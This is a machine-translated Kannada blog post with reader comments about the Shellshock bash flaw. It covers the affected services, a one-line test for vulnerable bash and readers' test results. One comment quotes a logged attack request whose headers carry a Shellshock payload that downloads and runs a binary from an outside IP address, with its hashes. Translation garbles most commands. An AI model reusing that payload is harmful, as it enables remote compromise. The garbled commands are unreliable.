ಇದು ಕೆಲವು ಬ್ಲಾಗ್ಗಳಲ್ಲಿ ಕಾಡ್ಗಿಚ್ಚಿನಂತೆ ಚಲಿಸುತ್ತದೆ, ಇದು ಪ್ರಕಟವಾದ ಸುದ್ದಿ ಭದ್ರತಾ ಬ್ಲಾಗ್ de ಕೆಂಪು ಟೋಪಿ ಜಾಗತಿಕ ಅಸ್ಥಿರಗಳ ದುರುಪಯೋಗದಿಂದಾಗಿ ಬ್ಯಾಷ್ನಲ್ಲಿ ಕಂಡುಬರುವ ದುರ್ಬಲತೆಯ ಬಗ್ಗೆ. ಮೂಲ ಸುದ್ದಿಗಳ ಪ್ರಕಾರ:
“… ಬಾಷ್ ಶೆಲ್ ಅನ್ನು ಕರೆಯುವ ಮೊದಲು ವಿಶೇಷವಾಗಿ ರಚಿಸಲಾದ ಮೌಲ್ಯಗಳೊಂದಿಗೆ ಪರಿಸರ ಅಸ್ಥಿರಗಳನ್ನು ರಚಿಸಬಹುದು ಎಂಬ ಅಂಶದಿಂದಾಗಿ ದುರ್ಬಲತೆ ಉಂಟಾಗುತ್ತದೆ. ಈ ಅಸ್ಥಿರಗಳು ಶೆಲ್ ಅನ್ನು ಆಹ್ವಾನಿಸಿದ ತಕ್ಷಣ ಕಾರ್ಯಗತಗೊಳ್ಳುವ ಕೋಡ್ ಅನ್ನು ಒಳಗೊಂಡಿರಬಹುದು. ಈ ವಿಸ್ತೃತ ಅಸ್ಥಿರಗಳ ಹೆಸರು ಅಪ್ರಸ್ತುತವಾಗುತ್ತದೆ, ಅವುಗಳ ವಿಷಯಗಳು ಮಾತ್ರ. ಪರಿಣಾಮವಾಗಿ, ಈ ದುರ್ಬಲತೆಯನ್ನು ಅನೇಕ ಸಂದರ್ಭಗಳಲ್ಲಿ ಬಹಿರಂಗಪಡಿಸಲಾಗುತ್ತದೆ, ಉದಾಹರಣೆಗೆ:
- ಫೋರ್ಸ್ ಕಮಾಂಡ್ ದೂರಸ್ಥ ಬಳಕೆದಾರರಿಗೆ ಸೀಮಿತ ಆಜ್ಞಾ ಕಾರ್ಯಗತಗೊಳಿಸುವ ಸಾಮರ್ಥ್ಯಗಳನ್ನು ಒದಗಿಸಲು ಇದನ್ನು sshd ಸಂರಚನೆಗಳಲ್ಲಿ ಬಳಸಲಾಗುತ್ತದೆ. ಅದನ್ನು ತಪ್ಪಿಸಲು ಮತ್ತು ಅನಿಯಂತ್ರಿತ ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಈ ನ್ಯೂನತೆಯನ್ನು ಬಳಸಬಹುದು. ಕೆಲವು ಜಿಟ್ ಮತ್ತು ಸಬ್ವರ್ಷನ್ ಅನುಷ್ಠಾನಗಳು ಅಂತಹ ನಿರ್ಬಂಧಿತ ಚಿಪ್ಪುಗಳನ್ನು ಬಳಸುತ್ತವೆ. ಬಳಕೆದಾರರು ಈಗಾಗಲೇ ಕನ್ಸೋಲ್ಗೆ ಪ್ರವೇಶವನ್ನು ಹೊಂದಿರುವುದರಿಂದ ಓಪನ್ ಎಸ್ಎಸ್ಎಚ್ನ ನಿಯಮಿತ ಬಳಕೆಯು ಪರಿಣಾಮ ಬೀರುವುದಿಲ್ಲ.
- ಸಿಜಿಐ ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು ಬ್ಯಾಷ್ ಅಥವಾ ಸ್ಪಾನ್ ಸಬ್ವೆಲ್ಗಳಲ್ಲಿ ಬರೆಯಲಾಗಿದ್ದರೆ mod_cgi ಅಥವಾ mod_cgid ಬಳಸುವ ಅಪಾಚೆ ಸರ್ವರ್ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ. ಪಿಎಚ್ಪಿ ಯಲ್ಲಿ ಸಿಸ್ಟಮ್ / ಎಕ್ಸಿಕ್ಯೂಟ್ ಶೆಲ್ ಅನ್ನು ಬಳಸುತ್ತಿದ್ದರೆ, ಸಿ ಯಲ್ಲಿ ಸಿಸ್ಟಮ್ / ಪೋಪನ್, ಪೈಥಾನ್ನಲ್ಲಿ ಒ.ಎಸ್.ಸಿಸ್ಟಮ್ / ಒ.ಎಸ್.ಪೋಪೆನ್, ಇಂತಹ ಸಬ್ವೆಲ್ಗಳನ್ನು ಸೂಚ್ಯವಾಗಿ ಬಳಸಲಾಗುತ್ತದೆ. (ಸಿಜಿಐ ಮೋಡ್ನಲ್ಲಿ ಚಾಲನೆಯಲ್ಲಿರುವಾಗ), ಮತ್ತು ಪರ್ಲ್ನಲ್ಲಿ ಓಪನ್ / ಸಿಸ್ಟಮ್ (ಇದು ಕಮಾಂಡ್ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಅವಲಂಬಿಸಿರುತ್ತದೆ).
- Mod_php ನೊಂದಿಗೆ ಚಲಿಸುವ ಪಿಎಚ್ಪಿ ಸ್ಕ್ರಿಪ್ಟ್ಗಳು ಸಬ್ವೆಲ್ಗಳನ್ನು ಆಡಿದರೂ ಸಹ ಪರಿಣಾಮ ಬೀರುವುದಿಲ್ಲ.
- ದುರುದ್ದೇಶಪೂರಿತ ಸರ್ವರ್ನಿಂದ ತೆಗೆದುಕೊಂಡ ಮೌಲ್ಯಗಳೊಂದಿಗೆ, ವ್ಯವಸ್ಥೆಯನ್ನು ಕಾನ್ಫಿಗರ್ ಮಾಡಲು ಡಿಎಚ್ಸಿಪಿ ಕ್ಲೈಂಟ್ಗಳು ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು ಆಹ್ವಾನಿಸುತ್ತವೆ. ಇದು ಡಿಎಚ್ಸಿಪಿ ಕ್ಲೈಂಟ್ ಯಂತ್ರದಲ್ಲಿ ಅನಿಯಂತ್ರಿತ ಆಜ್ಞೆಗಳನ್ನು ಸಾಮಾನ್ಯವಾಗಿ ರೂಟ್ನಂತೆ ಕಾರ್ಯಗತಗೊಳಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ.
- ಎಸ್ಯುಐಡಿ ಸವಲತ್ತುಗಳನ್ನು ಹೊಂದಿರುವ ವಿವಿಧ ಡೀಮನ್ಗಳು ಮತ್ತು ಪ್ರೋಗ್ರಾಂಗಳು ಬಳಕೆದಾರರಿಂದ ಹೊಂದಿಸಲ್ಪಟ್ಟ / ಪ್ರಭಾವಿತವಾದ ಪರಿಸರ ವೇರಿಯಬಲ್ ಮೌಲ್ಯಗಳೊಂದಿಗೆ ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು, ಇದು ಅನಿಯಂತ್ರಿತ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ.
- ಶೆಲ್ಗೆ ಸಿಕ್ಕಿಸುವ ಅಥವಾ ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಚಲಾಯಿಸುವ ಯಾವುದೇ ಅಪ್ಲಿಕೇಶನ್ ಬ್ಯಾಷ್ ಅನ್ನು ಇಂಟರ್ಪ್ರಿಟರ್ ಆಗಿ ಬಳಸುತ್ತದೆ. ಅಸ್ಥಿರ ರಫ್ತು ಮಾಡದ ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ಗಳು ವಿಶ್ವಾಸಾರ್ಹವಲ್ಲದ ವಿಷಯವನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸಿ ಅದನ್ನು ಸಂಗ್ರಹಿಸಿದರೂ ಸಹ, ಈ ಸಮಸ್ಯೆಗೆ ಗುರಿಯಾಗುವುದಿಲ್ಲ ಶೆಲ್ ಅಸ್ಥಿರಗಳು (ಎಡ) ಮತ್ತು ಸಬ್ವೆಲ್ಗಳು ತೆರೆದುಕೊಳ್ಳುತ್ತವೆ.
… »
ನನ್ನ ಬ್ಯಾಷ್ ಪರಿಣಾಮ ಬೀರುತ್ತದೆಯೇ ಎಂದು ತಿಳಿಯುವುದು ಹೇಗೆ?
ಇದನ್ನು ಗಮನಿಸಿದರೆ, ಈ ದುರ್ಬಲತೆಯಿಂದ ನಾವು ಪ್ರಭಾವಿತರಾಗಿದ್ದೇವೆ ಎಂದು ತಿಳಿಯಲು ಬಹಳ ಸರಳವಾದ ಮಾರ್ಗವಿದೆ. ವಾಸ್ತವವಾಗಿ, ನನ್ನ ಆಂಟರ್ಗೋಸ್ನಲ್ಲಿ ನಾನು ಪರೀಕ್ಷಿಸಿದ್ದೇನೆ ಮತ್ತು ಸ್ಪಷ್ಟವಾಗಿ ನನಗೆ ಯಾವುದೇ ಸಮಸ್ಯೆ ಇಲ್ಲ. ನಾವು ಮಾಡಬೇಕಾದುದು ಟರ್ಮಿನಲ್ ತೆರೆಯಿರಿ ಮತ್ತು ಇರಿಸಿ:
env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ಇದು ಒಂದು ಪರೀಕ್ಷೆ"
ಇದು ಈ ರೀತಿ ಹೊರಬಂದರೆ ನಮಗೆ ಯಾವುದೇ ಸಮಸ್ಯೆ ಇಲ್ಲ:
env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ಇದು ಒಂದು ಪರೀಕ್ಷೆ" ಬ್ಯಾಷ್: ಎಚ್ಚರಿಕೆ: x: ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನವನ್ನು ನಿರ್ಲಕ್ಷಿಸಿ ಪ್ರಯತ್ನ ಬ್ಯಾಷ್: `x' ಗಾಗಿ ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನವನ್ನು ಆಮದು ಮಾಡಿಕೊಳ್ಳುವಲ್ಲಿ ದೋಷ ಇದು ಒಂದು ಪರೀಕ್ಷೆ
ಫಲಿತಾಂಶವು ವಿಭಿನ್ನವಾಗಿದ್ದರೆ, ನಮ್ಮ ಆದ್ಯತೆಯ ವಿತರಣೆಗಳ ನವೀಕರಣ ಚಾನಲ್ಗಳನ್ನು ಅವರು ಈಗಾಗಲೇ ಪ್ಯಾಚ್ ಅನ್ನು ಅನ್ವಯಿಸಿದ್ದಾರೆಯೇ ಎಂದು ನೋಡಲು ನೀವು ಬಯಸಬಹುದು. ಆದ್ದರಿಂದ ನಿಮಗೆ ತಿಳಿದಿದೆ
ನವೀಕರಿಸಲಾಗಿದೆ: ಇದು ಉಬುಂಟು 14:04 ಅನ್ನು ಬಳಸುವ ಸಹೋದ್ಯೋಗಿಯ output ಟ್ಪುಟ್ ಆಗಿದೆ:
env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ಇದು ಒಂದು ಪರೀಕ್ಷೆ" ದುರ್ಬಲ ಇದು ಒಂದು ಪರೀಕ್ಷೆ
ನೀವು ನೋಡುವಂತೆ, ಇಲ್ಲಿಯವರೆಗೆ ಅದು ದುರ್ಬಲವಾಗಿದೆ.
ನಾನು 14.04 ರಿಂದ ಕುಬುಂಟು 64 ಅನ್ನು ಹೊಂದಿದ್ದೇನೆ ಮತ್ತು ನಾನು ಸಹ ಪಡೆಯುತ್ತೇನೆ:
env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ಇದು ಒಂದು ಪರೀಕ್ಷೆ"
ದುರ್ಬಲ
ಇದು ಒಂದು ಪರೀಕ್ಷೆ
ನಾನು ಈಗಾಗಲೇ ನವೀಕರಿಸಿದ್ದೇನೆ, ಆದರೆ ಅದು ಸರಿಪಡಿಸುವುದಿಲ್ಲ. ಏನ್ ಮಾಡೋದು?
ಅವರು ನವೀಕರಿಸಲು ಕಾಯಿರಿ. ಈಗಾಗಲೇ ಇಒಎಸ್ ಅನ್ನು ನವೀಕರಿಸಲಾಗಿದೆ ..
ಎಷ್ಟು ವಿಲಕ್ಷಣ, ನನ್ನಲ್ಲಿ ಕುಬುಂಟು 14.04 ಕೂಡ ಇದೆ
$ env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ಇದು ಒಂದು ಪರೀಕ್ಷೆ"
ಬ್ಯಾಷ್: ಎಚ್ಚರಿಕೆ: x: ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನ ಪ್ರಯತ್ನವನ್ನು ನಿರ್ಲಕ್ಷಿಸುವುದು
ಬ್ಯಾಷ್: `x 'ಗಾಗಿ ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನವನ್ನು ಆಮದು ಮಾಡಿಕೊಳ್ಳುವಲ್ಲಿ ದೋಷ
ಇದು ಒಂದು ಪರೀಕ್ಷೆ
ಇಂದು ಡೌನ್ಲೋಡ್ ಮಾಡಲಾದ "ಬ್ಯಾಷ್" ಪ್ಯಾಕೇಜ್ನ ಆವೃತ್ತಿ ಹೀಗಿದೆ ಎಂದು ನಾನು ಸೇರಿಸುತ್ತೇನೆ.
4.3-7 ಉಬುಂಟು 1.1
http://packages.ubuntu.com/trusty/bash
ನನ್ನ ಸಂದರ್ಭದಲ್ಲಿ, ಆಜ್ಞೆಯನ್ನು ನೀಡಿದರೆ, ಅದು ಟರ್ಮಿನಲ್ನಲ್ಲಿ ಈ ಕೆಳಗಿನವುಗಳನ್ನು ನೀಡುತ್ತದೆ:
>ಹೇಗಾದರೂ, ಜೋಕ್ ನಾನು ಡೆಬಿಯನ್ ವೀಜಿಯನ್ನು ನವೀಕರಿಸಿದ್ದೇನೆ ಮತ್ತು ಅದು ನನ್ನನ್ನು ಎಸೆದಿದೆ.
ವ್ಹೀಜಿ ಇನ್ನೂ ದೋಷದ ಎರಡನೇ ಭಾಗಕ್ಕೆ ಗುರಿಯಾಗಬಹುದು, ಕನಿಷ್ಠ ಮಧ್ಯಾಹ್ನದವರೆಗೆ (UTC -4: 30) ಸಮಸ್ಯೆ ಇನ್ನೂ ಅನುಸರಿಸುತ್ತಿದೆ: /
ಈ ಬೆಳಿಗ್ಗೆ ನವೀಕರಣವನ್ನು ಅನ್ವಯಿಸಿದ ನಂತರ ಸ್ಲಾಕ್ವೇರ್ ಅಥವಾ ಡೆಬಿಯನ್ ಅಥವಾ ಸೆಂಟೋಸ್ ಅನುಗುಣವಾದ ನವೀಕರಣವನ್ನು ಸ್ವೀಕರಿಸಿದಂತೆ ಪರಿಣಾಮ ಬೀರುವುದಿಲ್ಲ ಎಂದು ನಾನು ಪರಿಶೀಲಿಸಿದ್ದೇನೆ.
ಈ ಗಂಟೆಯಲ್ಲಿ ಉಬುಂಟು ಇನ್ನೂ ದುರ್ಬಲವಾಗಲು ಕಾರಣವೇನು? ಮತ್ತು ಇದು ಸುರಕ್ಷಿತ ಎಂದು ಹೇಳಿ: ಡಿ.
ಆದರೆ ನೀವು ಉಬುಂಟು ನವೀಕರಿಸಲು ಪ್ರಯತ್ನಿಸಿದ್ದೀರಾ?
ಇಂದಿನ ನವೀಕರಣದೊಂದಿಗೆ ಅವರು ಅದನ್ನು ಸರಿಪಡಿಸಿದ್ದಾರೆ.
OK
ಭದ್ರತಾ ತಜ್ಞರು 'ಬ್ಯಾಷ್' ದುರ್ಬಲತೆಯ ಬಗ್ಗೆ ಎಚ್ಚರಿಸುತ್ತಾರೆ, ಇದು ಹಾರ್ಟ್ಬಲ್ಡ್ ದೋಷಕ್ಕಿಂತ ಲಿನಕ್ಸ್ ಸಾಫ್ಟ್ವೇರ್ ಬಳಕೆದಾರರಿಗೆ ಹೆಚ್ಚಿನ ಅಪಾಯವನ್ನುಂಟುಮಾಡಬಹುದು, ಅಲ್ಲಿ ಹ್ಯಾಕರ್ಗಳು ಬ್ಯಾಷ್ನಲ್ಲಿನ ದೋಷವನ್ನು ವ್ಯವಸ್ಥೆಯ ಸಂಪೂರ್ಣ ನಿಯಂತ್ರಣವನ್ನು ಬಳಸಿಕೊಳ್ಳಬಹುದು.
ಸೈಬರ್ ಸೆಕ್ಯುರಿಟಿ ಸಂಸ್ಥೆ ರಾಪಿಡ್ 7 ನ ಎಂಜಿನಿಯರಿಂಗ್ ವ್ಯವಸ್ಥಾಪಕ ಟಾಡ್ ಬಿಯರ್ಡ್ಸ್ಲೆ, ನ್ಯೂನತೆಯನ್ನು ಅದರ ತೀವ್ರತೆಗೆ 10 ಎಂದು ರೇಟ್ ಮಾಡಲಾಗಿದೆ, ಅಂದರೆ ಅದು ಗರಿಷ್ಠ ಪರಿಣಾಮವನ್ನು ಬೀರುತ್ತದೆ ಮತ್ತು ಶೋಷಣೆಯ ಸಂಕೀರ್ಣತೆಗೆ "ಕಡಿಮೆ" ಎಂದು ರೇಟ್ ಮಾಡಿದೆ, ಅಂದರೆ 'ಹ್ಯಾಕರ್' ಗೆ ಇದು ಸುಲಭವಾಗಿದೆ ದಾಳಿಗಳು. ಈ ದುರ್ಬಲತೆಯನ್ನು ಬಳಸುವುದರ ಮೂಲಕ, ಆಕ್ರಮಣಕಾರರು ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಂನ ಮೇಲೆ ಹಿಡಿತ ಸಾಧಿಸಬಹುದು, ಗೌಪ್ಯ ಮಾಹಿತಿಯನ್ನು ಪ್ರವೇಶಿಸಬಹುದು, ಬದಲಾವಣೆಗಳನ್ನು ಮಾಡಬಹುದು, ”ಎಂದು ಬಿಯರ್ಡ್ಸ್ಲೆ ಹೇಳಿದರು. "ಬ್ಯಾಷ್ ಅನ್ನು ಆಕ್ರಮಿಸುವ ವ್ಯವಸ್ಥೆಗಳನ್ನು ಹೊಂದಿರುವ ಯಾರಾದರೂ ತಕ್ಷಣ ಪ್ಯಾಚ್ ಅನ್ನು ಅನ್ವಯಿಸಬೇಕು" ಎಂದು ಅವರು ಹೇಳಿದರು.
ಬ್ಯಾಚ್ ಆತಿಥ್ಯ ವಹಿಸಿರುವ ಹಳೆಯ ಟೂಲ್ (ಗ್ನು) ಅನ್ನು ಪ್ರಸ್ತುತಪಡಿಸುವ ಈ ದುರ್ಬಲತೆಗೆ ಮೊದಲು, ಗಿನೂವನ್ನು ತೊಡೆದುಹಾಕಲು ಮತ್ತು ಬಿಎಸ್ಡಿ ಸಾಧನಕ್ಕಾಗಿ ಬದಲಾಯಿಸಲು ಲಿನಕ್ಸ್ ಸಾಫ್ಟ್ವೇರ್ಗೆ ಹೆಚ್ಚು ಅನುಕೂಲಕರವಾಗಿದೆ.
ಪಿಎಸ್: ನನ್ನ ಅಭಿವ್ಯಕ್ತಿ ಸ್ವಾತಂತ್ರ್ಯವನ್ನು ಸೆನ್ಸಾರ್ ಮಾಡಬೇಡಿ, ... ಯಾರನ್ನೂ ಅವಮಾನಿಸಬೇಡಿ, ... ನಾನು ಅಳಿಸಿದ ಹಿಂದಿನ ಸಂದೇಶದಂತೆ ನನ್ನ ಸಂದೇಶವನ್ನು ಅಳಿಸಬೇಡಿ!.
ಓಹ್ ದಯವಿಟ್ಟು ಅದನ್ನು ಅತಿಯಾಗಿ ಮಾಡಬೇಡಿ. ಬಿಎಸ್ಡಿ ಬಳಸುವ ಜನರನ್ನು ನಾನು ಹೇಗೆ ದ್ವೇಷಿಸುತ್ತೇನೆ ಮತ್ತು ಈ ಯೋಜನೆಗಳಿಂದ ಗ್ನು, ಲಿನಕ್ಸ್ ಅಥವಾ ಯಾವುದನ್ನಾದರೂ ತಿರಸ್ಕರಿಸುತ್ತೇನೆ.
ನಾನು ನಿಮ್ಮೊಂದಿಗಿದ್ದೇನೆ ಮತ್ತು ಈ ರಂಧ್ರದ ತೀವ್ರತೆಗೆ ನೀವು ಸಂಪೂರ್ಣವಾಗಿ ಸರಿ.
ಇದು ಸೆನ್ಸಾರ್ಶಿಪ್ ಅಲ್ಲ, ಅದು ಪುನರುಕ್ತಿ (ನೀವು ಗ್ನೋಮ್ 3.14 ಪೋಸ್ಟ್ನಲ್ಲಿ ಅದೇ ಕಾಮೆಂಟ್ ಮಾಡಿದ್ದೀರಿ)
«… ಮತ್ತು ಶೋಷಣೆಯ ಸಂಕೀರ್ಣತೆಯ ಕಾರಣ 'ಕಡಿಮೆ' ಎಂದು ರೇಟ್ ಮಾಡಲಾಗಿದೆ, ಇದರರ್ಥ ಹ್ಯಾಕರ್ ದಾಳಿಗೆ ಇದು ಸುಲಭವಾಗಿದೆ»
ಅಸಂಗತತೆ ಗಮನಾರ್ಹವಾದುದಾಗಿದೆ?
ದುರ್ಬಲತೆಯನ್ನು ಬಳಸಿಕೊಳ್ಳುವುದು ಹೇಗೆ ಸುಲಭ ಮತ್ತು ಅದೇ ಸಮಯದಲ್ಲಿ "ಕಡಿಮೆ" ಮಟ್ಟದ ಅಪಾಯವನ್ನು ಹೊಂದಿರುತ್ತದೆ ಏಕೆಂದರೆ ಅದು ಬಳಸಲು ತುಂಬಾ ಸಂಕೀರ್ಣವಾಗಿದೆ?
ಇದು ಭೇಟಿಯಾದ ಕೆಲವೇ ಗಂಟೆಗಳಲ್ಲಿ ಪರಿಹರಿಸಲ್ಪಟ್ಟ ದೋಷವಾಗಿದೆ ಮತ್ತು ಹೃದಯವಂತನಂತೆ, ಶೋಷಣೆಗೆ ಒಳಗಾದ ಬಗ್ಗೆ ಯಾವುದೇ ವರದಿಗಳಿಲ್ಲ (ಸಹಜವಾಗಿ, ಇದು ಪರಸ್ಪರ ತಿಳಿದುಕೊಳ್ಳಲು ಕಡಿಮೆ ಸಮಯವನ್ನು ಹೊಂದಿದೆ).
ಇದು ನಿಜವಾದ ಅಪಾಯಕ್ಕಿಂತ ಹೆಚ್ಚು ಟ್ಯಾಬ್ಲಾಯ್ಡ್ ಪ್ರೆಸ್ ಆಗಿದೆ.
St ಸಿಬ್ಬಂದಿ ನಿಮಗೆ ಮುಖ್ಯವಲ್ಲವೆಂದು ತೋರುತ್ತದೆಯೇ? ನೀವು ಈಗ ಏನು ಹೇಳುತ್ತೀರಿ?
ಪಡೆಯಿರಿ. // HTTP/1.0
.ಯುಸರ್-ಏಜೆಂಟ್: .ಧನ್ಯವಾದಗಳು-ರಾಬ್
.ಕುಕಿ: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.ಹೋಸ್ಟ್: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.ರಫರರ್: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.ಒಪ್ಪಿಕೊಳ್ಳಿ:. * / *
$ ಫೈಲ್ nginx
nginx: ಗ್ನು / ಲಿನಕ್ಸ್ 32 ಗಾಗಿ ಸ್ಥಿರವಾಗಿ ಲಿಂಕ್ ಮಾಡಲಾದ ಇಎಲ್ಎಫ್ 80386-ಬಿಟ್ ಎಲ್ಎಸ್ಬಿ ಎಕ್ಸಿಕ್ಯೂಟಬಲ್, ಇಂಟೆಲ್ 1, ಆವೃತ್ತಿ 2.6.18 (ಎಸ್ವೈಎಸ್ವಿ)
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
ಅದು ಏನು ಎಂದು ನಿಮಗೆ ತಿಳಿದಿದೆಯೇ? ಸ್ವಲ್ಪ ಅಪಾಯಕಾರಿ ಏನೂ ಇಲ್ಲ ...
ಪರಿಸ್ಥಿತಿ ತುಂಬಾ ಗಂಭೀರವಾಗಿದೆ, ಆದರೆ ಅಲ್ಲಿಂದ ನೀವು ಬಿಎಸ್ಡಿ ಆಯ್ಕೆಗಾಗಿ ಬ್ಯಾಷ್ ಬಳಸುವುದನ್ನು ನಿಲ್ಲಿಸಬೇಕು ಎಂದು ಹೇಳುವುದು, ಅದು ಈಗಾಗಲೇ ಹೆಚ್ಚು, ಹೇಗಾದರೂ ನವೀಕರಣವು ಈಗಾಗಲೇ ಇದೆ, ನಾನು ನವೀಕರಣವನ್ನು ಸ್ಪರ್ಶಿಸುತ್ತೇನೆ ಮತ್ತು ಇನ್ನೇನೂ ಇಲ್ಲ.
ಈಗ ಪಿಡಿ, ಇದು ಹೆಚ್ಚು ಸಹೋದ್ಯೋಗಿ @ ರೋಬೆಟ್ ಎಂದು ನಾನು ಭಾವಿಸುತ್ತೇನೆ, ಇಲ್ಲಿ ನಿರ್ವಾಹಕರು ಈ ರೀತಿಯ ಕಾಮೆಂಟ್ಗಳನ್ನು ಅಳಿಸಲು ಮೀಸಲಾಗಿರುತ್ತಾರೆ ಎಂದು ನಾನು ಭಾವಿಸುವುದಿಲ್ಲ ಏಕೆಂದರೆ ಹೌದು, ಏಕೆಂದರೆ, ನಾನು ಈ ಸಮುದಾಯದಲ್ಲಿ ಭಾಗವಹಿಸಿದಾಗಿನಿಂದ ನಾನು ಆ ಭಾವನೆಯನ್ನು ಹೊಂದಿದ್ದೇನೆ ಮತ್ತು ಅದು ಹಾಗೆಯೇ ಇರುತ್ತದೆ ಎಂದು ನಾನು ಭಾವಿಸುತ್ತೇನೆ ದಾರಿ.
ಗ್ರೀಟಿಂಗ್ಸ್.
ನೀವು ಎರಡು ವಿಭಿನ್ನ ಪೋಸ್ಟ್ಗಳಲ್ಲಿ ಒಂದೇ ರೀತಿಯ ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ನೀಡಿದ್ದೀರಿ. ನೀವು ಕಥೆಯ "ಮೂಲ" ವನ್ನು ಪ್ರಚಾರ ಮಾಡಲು ಪ್ರಯತ್ನಿಸುತ್ತಿದ್ದರೆ, ಕ್ಷಮಿಸಿ, ಇದು ಸ್ಥಳವಲ್ಲ.
ಬ್ಯಾಷ್ ಯುನಿಕ್ಸ್ (ಮತ್ತು ಅದರ ಗ್ನೂ ಕ್ಲೋನ್) ನಿಂದ ಬಂದಿದೆ. ಒಎಸ್ಎಕ್ಸ್ನಂತಹ ಬಿಎಸ್ಡಿ ಆಧಾರಿತ ವ್ಯವಸ್ಥೆಗಳೂ ಸಹ ಪರಿಣಾಮ ಬೀರುತ್ತವೆ, ಮತ್ತು ಜೆನ್ಬೆಟಾ ಪ್ರಕಾರ, ಅವರು ಅದನ್ನು ಇನ್ನೂ ಪ್ಯಾಚ್ ಮಾಡಿಲ್ಲ. ಅಂತೆಯೇ, ಬ್ಯಾಷ್ ಅನ್ನು ಪ್ರವೇಶಿಸಲು ನಿಮಗೆ ಸ್ಥಳೀಯ ಅಥವಾ ಎಸ್ಎಸ್ಹೆಚ್ ಮೂಲಕ ಬಳಕೆದಾರ ಖಾತೆಯ ಅಗತ್ಯವಿದೆ.
-ಸಿಬ್ಬಂದಿ:
1.- ದೋಷದಿಂದ ಪ್ರಭಾವಿತವಾಗಬಹುದಾದ ಸೇವೆಗಳ ಪ್ರಮಾಣದಿಂದಾಗಿ ಇದನ್ನು ಮಟ್ಟ 10 (ಗರಿಷ್ಠ ಮಟ್ಟದ ಅಪಾಯ) ಎಂದು ವರ್ಗೀಕರಿಸಲಾಗಿದೆ. ಮುಖ್ಯ ಟಿಪ್ಪಣಿಯಲ್ಲಿ ಅವರು ಆ ಸಂಗತಿಯನ್ನು ಬಹಳ ಸ್ಪಷ್ಟಪಡಿಸುತ್ತಾರೆ, ದೋಷವು ಅಪಾಚೆ, ಎಸ್ಎಸ್ಡಿ, ಸ್ಯೂಡ್ ಅನುಮತಿ ಹೊಂದಿರುವ ಕಾರ್ಯಕ್ರಮಗಳು (xorg, ಇತರವು) ನಂತಹ ಸೇವೆಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರಬಹುದು ಎಂದು ವಾದಿಸುತ್ತಾರೆ.
2.- ಅದರ ಅನುಷ್ಠಾನಕ್ಕೆ ಬಂದಾಗ ಇದನ್ನು ಕಡಿಮೆ ಮಟ್ಟದ ತೊಂದರೆ ಎಂದು ವರ್ಗೀಕರಿಸಲಾಗಿದೆ, ಮತ್ತು ಇದಕ್ಕೆ ಉತ್ತಮ ಉದಾಹರಣೆಯೆಂದರೆ ಎಲಾವ್ ಅವರು ಪೋಸ್ಟ್ನಲ್ಲಿ ಇರಿಸಿರುವ ದುರ್ಬಲತೆ ಪರೀಕ್ಷಾ ಸ್ಕ್ರಿಪ್ಟ್. ನೀವು ನೋಡುವಂತೆ ಕಾರ್ಯಗತಗೊಳಿಸಲು ತುಂಬಾ ಕಷ್ಟವಲ್ಲ.
ನಾನು ಮಾಹಿತಿಯಲ್ಲಿ ಪುನರುಕ್ತಿ ಕಾಣುತ್ತಿಲ್ಲ (ನಾನು ಗೂಗಲ್ ಅನುವಾದವನ್ನು ಮಾತ್ರ ನೋಡುತ್ತೇನೆ) ಮತ್ತು ಸಮಸ್ಯೆ ಸಾಕಷ್ಟು ಗಂಭೀರವಾಗಿದ್ದರೆ, ಮತ್ತು ನೀವು ಹೇಳಿದಂತೆ, ಇದು ಈಗಾಗಲೇ ಪ್ಯಾಚ್ ಮತ್ತು ಪರಿಹಾರವನ್ನು ಹೊಂದಿದೆ, ಆದರೆ ಅದಕ್ಕಾಗಿ ಅಲ್ಲ, ಅದು ಇನ್ನು ಮುಂದೆ ಅಪಾಯವಲ್ಲ, ಮತ್ತು ಸಾಕಷ್ಟು ನೈಜವಾದದ್ದು.
etPetercheco / uk ಯುಕಿಟೆರು
